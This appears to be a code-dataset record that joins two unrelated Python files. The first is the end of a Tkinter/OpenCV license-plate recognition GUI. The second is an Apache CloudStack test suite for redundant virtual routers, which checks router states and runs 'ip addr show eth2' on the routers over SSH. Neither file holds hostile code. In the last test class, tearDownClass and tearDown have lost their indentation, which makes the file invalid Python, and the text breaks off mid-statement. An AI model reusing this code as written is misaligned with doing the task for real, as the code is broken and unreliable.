        button3.pack(anchor="se", pady="5")
        self.predictor = predict.CardPredictor()
        self.predictor.train_svm()

    def get_imgtk(self, img_bgr):
        """Convert a BGR OpenCV image to a Tk PhotoImage scaled to fit the view.

        Parameters
        ----------
        img_bgr: numpy array as returned by cv2 (BGR channel order).

        Returns
        -------
        ImageTk.PhotoImage no larger than viewwide x viewhigh.
        """
        img = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)
        im = Image.fromarray(img)
        imgtk = ImageTk.PhotoImage(image=im)
        wide = imgtk.width()
        high = imgtk.height()
        if wide > self.viewwide or high > self.viewhigh:
            wide_factor = self.viewwide / wide
            high_factor = self.viewhigh / high
            # Uniform scale that fits both dimensions.
            factor = min(wide_factor, high_factor)
            wide = int(wide * factor)
            if wide <= 0:
                wide = 1
            high = int(high * factor)
            if high <= 0:
                high = 1
            # BUG FIX: Image.ANTIALIAS was removed in Pillow 10;
            # Image.LANCZOS is the same filter under its canonical name.
            im = im.resize((wide, high), Image.LANCZOS)
            imgtk = ImageTk.PhotoImage(image=im)
        return imgtk

    def show_roi(self, r, roi, color):
        """Show the plate ROI, recognized text and color; clear stale results.

        When `r` is falsy and the last good result is older than 8 seconds,
        the previous ROI/result display is cleared.
        """
        if r:
            roi = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)
            roi = Image.fromarray(roi)
            self.imgtk_roi = ImageTk.PhotoImage(image=roi)
            self.roi_ctl.configure(image=self.imgtk_roi, state='enable')
            self.r_ctl.configure(text=str(r))
            self.update_time = time.time()
            try:
                c = self.color_transform[color]
                self.color_ctl.configure(text=c[0], background=c[1], state='enable')
            except KeyError:
                # Unknown plate color: grey out the indicator instead of
                # crashing (was a bare except:).
                self.color_ctl.configure(state='disabled')
        elif self.update_time + 8 < time.time():
            self.roi_ctl.configure(state='disabled')
            self.r_ctl.configure(text="")
            self.color_ctl.configure(state='disabled')

    def from_vedio(self):
        """Start live recognition from the local camera in a daemon thread."""
        if self.thread_run:
            return
        if self.camera is None:
            self.camera = cv2.VideoCapture(0)
            if not self.camera.isOpened():
                # BUG FIX: the original called mBox.showwarning, but no
                # name "mBox" exists anywhere -> NameError at runtime.
                # tkinter.messagebox is what this file imports.
                messagebox.showwarning('警告', '摄像头打开失败!')
                self.camera = None
                return
        self.thread = threading.Thread(target=self.vedio_thread, args=(self,))
        # Daemon so the thread never blocks interpreter exit;
        # Thread.setDaemon() is deprecated, assign the attribute instead.
        self.thread.daemon = True
        self.thread.start()
        self.thread_run = True

    def api(self):
        """Open the Baidu vehicle-recognition web API page in a browser."""
        webbrowser.open("https://ai.baidu.com/tech/vehicle/car")

    def from_pic(self):
        """Stop any camera session, load a picture and recognize its plate."""
        self.thread_run = False
        self.pic_path = askopenfilename(title="选择识别图片", filetypes=[("jpg图片", "*.jpg")])
        if self.pic_path:
            img_bgr = predict.imreadex(self.pic_path)
            self.imgtk = self.get_imgtk(img_bgr)
            self.image_ctl.configure(image=self.imgtk)
            r, roi, color = self.predictor.predict(img_bgr)
            self.show_roi(r, roi, color)

    @staticmethod
    def vedio_thread(self):
        """Camera loop: display every frame, run recognition every ~2s.

        Kept as a staticmethod that receives the instance explicitly via
        Thread(args=(self,)) — callers depend on this shape.
        """
        self.thread_run = True
        predict_time = time.time()
        while self.thread_run:
            _, img_bgr = self.camera.read()
            self.imgtk = self.get_imgtk(img_bgr)
            self.image_ctl.configure(image=self.imgtk)
            if time.time() - predict_time > 2:
                r, roi, color = self.predictor.predict(img_bgr)
                self.show_roi(r, roi, color)
                predict_time = time.time()
        print("run end")
def close_window():
    # Window-close handler: stop the camera thread first (give it up to
    # 2 seconds to exit) so it doesn't touch destroyed widgets, then tear
    # down the Tk root. Relies on the module-level `surface` and `win`
    # created in the __main__ block.
    print("destroy")
    if surface.thread_run :
        surface.thread_run = False
        surface.thread.join(2.0)
    win.destroy()
if __name__ == '__main__':
    # Build the root window, mount the Surface UI, and route window-close
    # through close_window so the capture thread is stopped cleanly.
    win=tk.Tk()
    surface = Surface(win)
    win.protocol('WM_DELETE_WINDOW', close_window)
    win.mainloop()
|
test_redundant_router.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.plugins.attrib import attr
from marvin.lib.base import (Account,
Router,
NetworkOffering,
Network,
VirtualMachine,
ServiceOffering,
Host)
from marvin.lib.utils import cleanup_resources
from marvin.lib.common import (get_domain,
get_template,
get_zone,
get_process_status)
import time
import multiprocessing
# Import Local Modules
from marvin.cloudstackTestCase import cloudstackTestCase
class TestCreateRvRNetworkOffering(cloudstackTestCase):
    """Verify that a network offering with the RedundantRouter capability
    can be created and enabled."""

    @classmethod
    def setUpClass(cls):
        # Class-wide fixtures: API client, parsed test data, zone/domain.
        # Resources appended to cls._cleanup are destroyed once for the
        # whole class in tearDownClass.
        cls.testClient = super(
            TestCreateRvRNetworkOffering,
            cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.testdata = cls.testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls._cleanup = []
        return

    @classmethod
    def tearDownClass(cls):
        try:
            # Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    def setUp(self):
        # Per-test clients plus a per-test cleanup list (freed in tearDown).
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
        self.cleanup = []
        return

    def tearDown(self):
        try:
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    @attr(tags=["advanced", "advancedns", "ssh"])
    def test_createRvRNetworkOffering(self):
        """Test create RvR supported network offering
        """
        # Steps to validate
        # 1. create a network offering
        # - all services by VirtualRouter
        # - enable RedundantRouter servicecapability
        # 2. enable the network offering
        # Validate the following
        # 1. Redundant Router offering should be created successfully and
        # listed in listNetworkOfferings response
        # assert if RvR capability is enabled
        self.debug("Creating network offering with redundant VR capability")
        try:
            network_offering = NetworkOffering.create(
                self.apiclient,
                self.testdata["nw_off_isolated_RVR"],
                conservemode=True
            )
        except Exception as e:
            self.fail("Create network offering failed! - %s" % e)
        self.debug("Enabling network offering - %s" % network_offering.name)
        # Enable Network offering
        network_offering.update(self.apiclient, state='Enabled')
        self.cleanup.append(network_offering)
        self.debug("Checking if the network offering created successfully?")
        network_offs = NetworkOffering.list(
            self.apiclient,
            id=network_offering.id,
            listall=True
        )
        self.assertEqual(
            isinstance(network_offs, list),
            True,
            "List network offering should not return empty response"
        )
        self.assertEqual(
            len(network_offs),
            1,
            "List network off should have newly created network off"
        )
        # Walk the offering's services and confirm the SourceNat service
        # advertises RedundantRouter=true.
        for service in network_offs[0].service:
            if service.name == 'SourceNat':
                self.debug("Verifying SourceNat capabilites")
                for capability in service.capability:
                    if capability.name == 'RedundantRouter':
                        self.assertTrue(capability.value == 'true')
                        self.debug("RedundantRouter is enabled")
        return
class TestCreateRvRNetwork(cloudstackTestCase):
    """Verify that deploying a VM on an RvR-enabled network spawns a
    MASTER/BACKUP router pair with the expected public/guest addressing."""

    @classmethod
    def setUpClass(cls):
        # Class-wide fixtures: service offering plus an enabled RvR network
        # offering; both are destroyed once in tearDownClass.
        cls.testClient = super(TestCreateRvRNetwork, cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.testdata = cls.testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.testdata["ostype"]
        )
        cls.testdata["small"]["zoneid"] = cls.zone.id
        cls.testdata["small"]["template"] = cls.template.id
        cls._cleanup = []
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.testdata["service_offering"]
        )
        cls._cleanup.append(cls.service_offering)
        cls.network_offering = NetworkOffering.create(
            cls.api_client,
            cls.testdata["nw_off_isolated_RVR"],
            conservemode=True
        )
        cls._cleanup.append(cls.network_offering)
        # Enable Network offering
        cls.network_offering.update(cls.api_client, state='Enabled')
        return

    @classmethod
    def tearDownClass(cls):
        try:
            # Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    def setUp(self):
        # Fresh admin account per test; inserted at index 0 so it is
        # cleaned up last (after resources it owns).
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
        self.account = Account.create(
            self.apiclient,
            self.testdata["account"],
            admin=True,
            domainid=self.domain.id
        )
        self.cleanup = []
        self.cleanup.insert(0, self.account)
        return

    def tearDown(self):
        try:
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    @attr(tags=["advanced", "advancedns", "ssh"])
    def test_createRvRNetwork(self):
        """Test create network with redundant routers
        """
        # Validate the following:
        # 1. listNetworkOfferings shows created offering
        # 2. listNetworks should show created network in Allocated state
        # 3. returns no Running routers in the network
        # 4. listVirtualmachines shows VM in Running state
        # 5. returns 2 routers
        # - same public IP
        # - same MAC address of public NIC
        # - different guestip address
        # - redundant state (MASTER or BACKUP)
        # - same gateway for the public traffic
        # 6. all routers, networks and user VMs are cleaned up
        # Creating network using the network offering created
        self.debug("Creating network with network offering: %s" %
                   self.network_offering.id)
        network = Network.create(
            self.apiclient,
            self.testdata["network"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            networkofferingid=self.network_offering.id,
            zoneid=self.zone.id
        )
        self.debug("Created network with ID: %s" % network.id)
        networks = Network.list(
            self.apiclient,
            id=network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(networks, list),
            True,
            "List networks should return a valid response for created network"
        )
        nw_response = networks[0]
        self.debug("Network state: %s" % nw_response.state)
        self.assertEqual(
            nw_response.state,
            "Allocated",
            "The network should be in allocated state after creation"
        )
        self.debug("Listing routers for network: %s" % network.name)
        routers = Router.list(
            self.apiclient,
            networkid=network.id,
            listall=True
        )
        # No VM deployed yet, so no routers should exist.
        self.assertEqual(
            routers,
            None,
            "Routers should not be spawned when network is in allocated state"
        )
        self.debug("Deploying VM in account: %s" % self.account.name)
        # Spawn an instance in that network
        VirtualMachine.create(
            self.apiclient,
            self.testdata["small"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            serviceofferingid=self.service_offering.id,
            networkids=[str(network.id)]
        )
        self.debug("Deployed VM in network: %s" % network.id)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        self.debug("Listing routers for network: %s" % network.name)
        routers = Router.list(
            self.apiclient,
            networkid=network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            len(routers),
            2,
            "Length of the list router should be 2 (Backup & master)"
        )
        # Identify which of the two routers is MASTER vs BACKUP.
        if routers[0].redundantstate == 'MASTER':
            master_router = routers[0]
            backup_router = routers[1]
        else:
            master_router = routers[1]
            backup_router = routers[0]
        self.debug("Redundant states: %s, %s" % (
            master_router.redundantstate,
            backup_router.redundantstate
        ))
        self.assertEqual(
            master_router.publicip,
            backup_router.publicip,
            "Public Ip should be same for both(MASTER & BACKUP)"
        )
        self.assertEqual(
            master_router.redundantstate,
            "MASTER",
            "Redundant state of router should be MASTER"
        )
        self.assertEqual(
            backup_router.redundantstate,
            "BACKUP",
            "Redundant state of router should be BACKUP"
        )
        self.assertNotEqual(
            master_router.guestipaddress,
            backup_router.guestipaddress,
            "Both (MASTER & BACKUP) routers should not have same guest IP"
        )
        self.assertNotEqual(
            master_router.guestmacaddress,
            backup_router.guestmacaddress,
            "Both (MASTER & BACKUP) routers should not have same guestMAC"
        )
        return
class TestCreateRvRNetworkNonDefaultGuestCidr(cloudstackTestCase):
    """Same as TestCreateRvRNetwork but with a non-default guest CIDR
    (192.168.2.0/23) supplied at network creation time."""

    @classmethod
    def setUpClass(cls):
        # Class-wide fixtures: service offering plus an enabled RvR network
        # offering; both are destroyed once in tearDownClass.
        cls.testClient = super(
            TestCreateRvRNetworkNonDefaultGuestCidr,
            cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.testdata = cls.testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.testdata["ostype"]
        )
        cls.testdata["small"]["zoneid"] = cls.zone.id
        cls.testdata["small"]["template"] = cls.template.id
        cls._cleanup = []
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.testdata["service_offering"]
        )
        cls._cleanup.append(cls.service_offering)
        cls.network_offering = NetworkOffering.create(
            cls.api_client,
            cls.testdata["nw_off_isolated_RVR"],
            conservemode=True
        )
        cls._cleanup.append(cls.network_offering)
        # Enable Network offering
        cls.network_offering.update(cls.api_client, state='Enabled')
        return

    @classmethod
    def tearDownClass(cls):
        try:
            # Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    def setUp(self):
        # Fresh admin account per test; inserted at index 0 so it is
        # cleaned up last (after resources it owns).
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
        self.account = Account.create(
            self.apiclient,
            self.testdata["account"],
            admin=True,
            domainid=self.domain.id
        )
        self.cleanup = []
        self.cleanup.insert(0, self.account)
        return

    def tearDown(self):
        try:
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    @attr(tags=["advanced", "advancedns"])
    def test_createRvRNetwork(self):
        """Test create network with non-default guest cidr with redundant routers
        """
        # Validate the following:
        # 1. listNetworkOfferings shows created offering
        # 2. listNetworks should show created network in Allocated state
        # - gw = 192.168.2.1 and cidr = 192.168.2.0/23
        # 3. returns no Running routers in the network
        # 4. listVirtualmachines shows VM in Running state
        # 5. returns 2 routers
        # - same public IP
        # - same MAC address of public NIC
        # - different guestip address
        # - redundant state (MASTER or BACKUP)
        # - same gateway for the public traffic
        # 6. all routers, networks and user VMs are cleaned up
        # Creating network using the network offering created
        self.debug("Creating network with network offering: %s" %
                   self.network_offering.id)
        network = Network.create(
            self.apiclient,
            self.testdata["network"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            networkofferingid=self.network_offering.id,
            zoneid=self.zone.id,
            netmask='255.255.254.0',
            gateway='192.168.2.1'
        )
        self.debug("Created network with ID: %s" % network.id)
        networks = Network.list(
            self.apiclient,
            id=network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(networks, list),
            True,
            "List networks should return a valid response for created network"
        )
        nw_response = networks[0]
        self.debug("Network state: %s" % nw_response.state)
        self.assertEqual(
            nw_response.state,
            "Allocated",
            "The network should be in allocated state after creation"
        )
        # The custom netmask/gateway must round-trip through the API.
        self.assertEqual(
            nw_response.gateway,
            '192.168.2.1',
            "The gateway should be 192.168.2.1"
        )
        self.assertEqual(
            nw_response.cidr,
            '192.168.2.0/23',
            "Guest cidr should be 192.168.2.0/23 but is %s" % nw_response.cidr
        )
        self.debug("Listing routers for network: %s" % network.name)
        routers = Router.list(
            self.apiclient,
            networkid=network.id,
            listall=True
        )
        # No VM deployed yet, so no routers should exist.
        self.assertEqual(
            routers,
            None,
            "Routers should not be spawned when network is in allocated state"
        )
        self.debug("Deploying VM in account: %s" % self.account.name)
        # Spawn an instance in that network
        VirtualMachine.create(
            self.apiclient,
            self.testdata["small"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            serviceofferingid=self.service_offering.id,
            networkids=[str(network.id)]
        )
        self.debug("Deployed VM in network: %s" % network.id)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        self.debug("Listing routers for network: %s" % network.name)
        routers = Router.list(
            self.apiclient,
            networkid=network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            len(routers),
            2,
            "Length of the list router should be 2 (Backup & master)"
        )
        # Identify which of the two routers is MASTER vs BACKUP.
        if routers[0].redundantstate == 'MASTER':
            master_router = routers[0]
            backup_router = routers[1]
        else:
            master_router = routers[1]
            backup_router = routers[0]
        self.assertEqual(
            master_router.publicip,
            backup_router.publicip,
            "Public Ip should be same for both(MASTER & BACKUP)"
        )
        self.assertEqual(
            master_router.redundantstate,
            "MASTER",
            "Redundant state of router should be MASTER"
        )
        self.assertEqual(
            backup_router.redundantstate,
            "BACKUP",
            "Redundant state of router should be BACKUP"
        )
        self.assertNotEqual(
            master_router.guestipaddress,
            backup_router.guestipaddress,
            "Both (MASTER & BACKUP) routers should not have same guest IP"
        )
        self.assertNotEqual(
            master_router.guestmacaddress,
            backup_router.guestmacaddress,
            "Both (MASTER & BACKUP) routers should not have same guestMAC"
        )
        return
class TestRVRInternals(cloudstackTestCase):
    """Inspect the MASTER/BACKUP router pair from the inside: eth2 link
    state, broadcast address, and the user VM's default gateway."""

    @classmethod
    def setUpClass(cls):
        # Class-wide fixtures: service offering plus an enabled RvR network
        # offering; both are destroyed once in tearDownClass.
        cls.testClient = super(TestRVRInternals, cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.testdata = cls.testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.testdata["ostype"]
        )
        cls.testdata["small"]["zoneid"] = cls.zone.id
        cls.testdata["small"]["template"] = cls.template.id
        cls._cleanup = []
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.testdata["service_offering"]
        )
        cls._cleanup.append(cls.service_offering)
        cls.network_offering = NetworkOffering.create(
            cls.api_client,
            cls.testdata["nw_off_isolated_RVR"],
            conservemode=True
        )
        cls._cleanup.append(cls.network_offering)
        # Enable Network offering
        cls.network_offering.update(cls.api_client, state='Enabled')
        return

    @classmethod
    def tearDownClass(cls):
        try:
            # Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    def setUp(self):
        # Fresh admin account per test; the hypervisor type decides how we
        # reach the router (via mgmt server for vmware/hyperv, else host).
        self.apiclient = self.testClient.getApiClient()
        self.hypervisor = self.testClient.getHypervisorInfo()
        self.dbclient = self.testClient.getDbConnection()
        self.account = Account.create(
            self.apiclient,
            self.testdata["account"],
            admin=True,
            domainid=self.domain.id
        )
        self.cleanup = []
        self.cleanup.insert(0, self.account)
        return

    def tearDown(self):
        try:
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    @attr(tags=["advanced", "advancedns", "ssh"])
    def test_redundantVR_internals(self):
        """Test redundant router internals
        """
        # Steps to validate
        # 1. createNetwork using network offering for redundant virtual router
        # 2. listRouters in above network
        # 3. deployVM in above user account in the created network
        # 4. login to both Redundant Routers
        # 5. login to user VM
        # 6. delete user account
        # Validate the following:
        # 1. listNetworks lists network in Allocated state
        # 2. listRouters lists no routers created yet
        # 3. listRouters returns Master and Backup routers
        # 4. ssh in to both routers and verify:
        # - MASTER router has eth2 with public Ip address
        # - BACKUP router has only guest eth0 and link local eth1
        # - Broadcast on MASTER eth2 is non-zero (0.0.0.0)
        # - execute checkrouter.sh in router home and check if it is status
        # "MASTER|BACKUP" as returned by the listRouters API
        # 5. DNS of the user VM is set to RedundantRouter Gateway
        # (/etc/resolv.conf)
        # Check that the default gateway for the guest is the rvr gateway
        # and not the guestIp of either of the RvRs
        # Creating network using the network offering created
        self.debug("Creating network with network offering: %s" %
                   self.network_offering.id)
        network = Network.create(
            self.apiclient,
            self.testdata["network"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            networkofferingid=self.network_offering.id,
            zoneid=self.zone.id
        )
        self.debug("Created network with ID: %s" % network.id)
        networks = Network.list(
            self.apiclient,
            id=network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(networks, list),
            True,
            "List networks should return a valid response for created network"
        )
        nw_response = networks[0]
        self.debug("Network state: %s" % nw_response.state)
        self.assertEqual(
            nw_response.state,
            "Allocated",
            "The network should be in allocated state after creation"
        )
        self.debug("Listing routers for network: %s" % network.name)
        routers = Router.list(
            self.apiclient,
            networkid=network.id,
            listall=True
        )
        # No VM deployed yet, so no routers should exist.
        self.assertEqual(
            routers,
            None,
            "Routers should not be spawned when network is in allocated state"
        )
        self.debug("Deploying VM in account: %s" % self.account.name)
        # Spawn an instance in that network
        virtual_machine = VirtualMachine.create(
            self.apiclient,
            self.testdata["small"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            serviceofferingid=self.service_offering.id,
            networkids=[str(network.id)]
        )
        self.debug("Deployed VM in network: %s" % network.id)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        self.debug("Listing routers for network: %s" % network.name)
        routers = Router.list(
            self.apiclient,
            networkid=network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            len(routers),
            2,
            "Length of the list router should be 2 (Backup & master)"
        )
        # Identify which of the two routers is MASTER vs BACKUP.
        if routers[0].redundantstate == 'MASTER':
            master_router = routers[0]
            backup_router = routers[1]
        else:
            master_router = routers[1]
            backup_router = routers[0]
        self.debug("Fetching the host details for double hop into router")
        hosts = Host.list(
            self.apiclient,
            id=master_router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "List hosts should return a valid list"
        )
        master_host = hosts[0]
        self.debug("Host for master router: %s" % master_host.name)
        self.debug("Host for master router: %s" % master_host.ipaddress)
        hosts = Host.list(
            self.apiclient,
            id=backup_router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "List hosts should return a valid list"
        )
        backup_host = hosts[0]
        self.debug("Host for backup router: %s" % backup_host.name)
        self.debug("Host for backup router: %s" % backup_host.ipaddress)
        self.debug(master_router.linklocalip)
        # Check eth2 port for master router.
        # On vmware/hyperv the router is reached through the management
        # server; on other hypervisors we hop through the router's host.
        if self.hypervisor.lower() in ('vmware', 'hyperv'):
            result = get_process_status(
                self.apiclient.connection.mgtSvr,
                22,
                self.apiclient.connection.user,
                self.apiclient.connection.passwd,
                master_router.linklocalip,
                'ip addr show eth2',
                hypervisor=self.hypervisor
            )
        else:
            result = get_process_status(
                master_host.ipaddress,
                22,
                self.testdata['configurableData']['host']["username"],
                self.testdata['configurableData']['host']["password"],
                master_router.linklocalip,
                "ip addr show eth2"
            )
        res = str(result)
        self.debug("Command 'ip addr show eth2': %s" % result)
        self.debug("Router's public Ip: %s" % master_router.publicip)
        self.assertEqual(
            res.count("state UP"),
            1,
            "MASTER router's public interface should be UP"
        )
        # BUG FIX: counting on `result` (which may be a list of lines)
        # matched whole elements and was trivially 0; count substrings in
        # the stringified output like the "state UP" check above does.
        self.assertEqual(
            res.count('brd 0.0.0.0'),
            0,
            "Broadcast address of eth2 should not be 0.0.0.0"
        )
        # Check eth2 port for backup router
        if self.hypervisor.lower() in ('vmware', 'hyperv'):
            result = get_process_status(
                self.apiclient.connection.mgtSvr,
                22,
                self.apiclient.connection.user,
                self.apiclient.connection.passwd,
                backup_router.linklocalip,
                'ip addr show eth2',
                hypervisor=self.hypervisor
            )
        else:
            result = get_process_status(
                backup_host.ipaddress,
                22,
                self.testdata['configurableData']['host']["username"],
                self.testdata['configurableData']['host']["password"],
                backup_router.linklocalip,
                "ip addr show eth2"
            )
        res = str(result)
        self.debug("Command 'ip addr show eth2': %s" % result)
        self.assertEqual(
            res.count("state DOWN"),
            1,
            "BACKUP router's public interface should be DOWN"
        )
        # BUG FIX: same substring-count fix as for the master router.
        self.assertEqual(
            res.count('brd 0.0.0.0'),
            0,
            "Broadcast address of eth2 should not be 0.0.0.0"
        )
        vms = VirtualMachine.list(
            self.apiclient,
            id=virtual_machine.id,
            listall=True
        )
        self.assertEqual(
            isinstance(vms, list),
            True,
            "List VMs should not return empty response"
        )
        vm = vms[0]
        # The guest's default gateway must be the shared RvR gateway, not
        # either router's own IP. (BUG FIX: the original failure messages
        # said "should be same" while asserting inequality.)
        self.assertNotEqual(
            vm.nic[0].gateway,
            master_router.publicip,
            "The gateway of user VM should not be the MASTER router's IP"
        )
        self.assertNotEqual(
            vm.nic[0].gateway,
            backup_router.publicip,
            "The gateway of user VM should not be the BACKUP router's IP"
        )
        return
class TestRvRRedundancy(cloudstackTestCase):
    @classmethod
    def setUpClass(cls):
        """One-time setup for the whole test class.

        Resolves zone/domain/template, then creates (and registers for
        cleanup) a service offering plus TWO identical redundant-VR
        network offerings: ``network_offering`` for normal tests and
        ``network_offering_for_update`` as the migration target used by
        test_06's updateNetwork call.
        """
        cls.testClient = super(TestRvRRedundancy, cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.testdata = cls.testClient.getParsedTestDataConfig()
        # Get Zone, Domain and template for the configured OS type.
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.testdata["ostype"]
        )
        # Inject zone/template into the VM deployment payload used by setUp().
        cls.testdata["small"]["zoneid"] = cls.zone.id
        cls.testdata["small"]["template"] = cls.template.id
        cls._cleanup = []
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.testdata["service_offering"]
        )
        cls._cleanup.append(cls.service_offering)
        cls.network_offering = NetworkOffering.create(
            cls.api_client,
            cls.testdata["nw_off_isolated_RVR"],
            conservemode=True
        )
        cls.network_offering_for_update = NetworkOffering.create(
            cls.api_client,
            cls.testdata["nw_off_isolated_RVR"],
            conservemode=True
        )
        cls._cleanup.append(cls.network_offering_for_update)
        cls._cleanup.append(cls.network_offering)
        # Offerings are created Disabled; enable both before use.
        cls.network_offering.update(cls.api_client, state='Enabled')
        cls.network_offering_for_update.update(cls.api_client, state='Enabled')
        return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
    def setUp(self):
        """Per-test setup: account + RVR network + one VM in that network.

        The VM deployment is what actually triggers creation of the
        redundant router pair; the trailing sleep gives the VRs time to
        elect MASTER/BACKUP before a test inspects them.
        """
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
        self.cleanup = []
        self.account = Account.create(
            self.apiclient,
            self.testdata["account"],
            admin=True,
            domainid=self.domain.id
        )
        # Insert at the front so the account is deleted last relative to
        # anything a test prepends later.
        self.cleanup.insert(0, self.account)
        # Creating network using the redundant-VR network offering.
        self.debug("Creating network with network offering: %s" %
                   self.network_offering.id)
        self.network = Network.create(
            self.apiclient,
            self.testdata["network"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            networkofferingid=self.network_offering.id,
            zoneid=self.zone.id
        )
        self.debug("Created network with ID: %s" % self.network.id)
        self.debug("Deploying VM in account: %s" % self.account.name)
        # Spawn an instance in that network; this starts the router pair.
        self.virtual_machine = VirtualMachine.create(
            self.apiclient,
            self.testdata["small"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            serviceofferingid=self.service_offering.id,
            networkids=[str(self.network.id)]
        )
        self.debug("Deployed VM in network: %s" % self.network.id)
        # Wait for the VRs to settle into MASTER/BACKUP states.
        time.sleep(self.testdata["sleep"])
        return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
    @attr(tags=["advanced", "advancedns", "ssh"])
    def test_01_stopMasterRvR(self):
        """Stop the MASTER router and verify fail-over.

        Steps:
        1. Find the MASTER/BACKUP pair of the test network.
        2. Stop the MASTER; the old MASTER should report UNKNOWN/FAULT
           and the old BACKUP should take over as MASTER.
        3. Start the stopped router again; it must rejoin as BACKUP and
           keep the same source-NAT public IP it had before.
        """
        self.debug("Listing routers for network: %s" % self.network.name)
        routers = Router.list(
            self.apiclient,
            networkid=self.network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            len(routers),
            2,
            "Length of the list router should be 2 (Backup & master)"
        )
        # Classify the pair by their reported redundant state.
        if routers[0].redundantstate == 'MASTER':
            master_router = routers[0]
            backup_router = routers[1]
        else:
            master_router = routers[1]
            backup_router = routers[0]
        self.debug("Stopping the MASTER router")
        try:
            Router.stop(self.apiclient, id=master_router.id)
        except Exception as e:
            self.fail("Failed to stop master router: %s" % e)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        self.debug("Listing routers for network: %s" % self.network.name)
        routers = Router.list(
            self.apiclient,
            id=master_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        # A stopped VR may report either UNKNOWN or FAULT.
        self.assertIn(
            routers[0].redundantstate, [
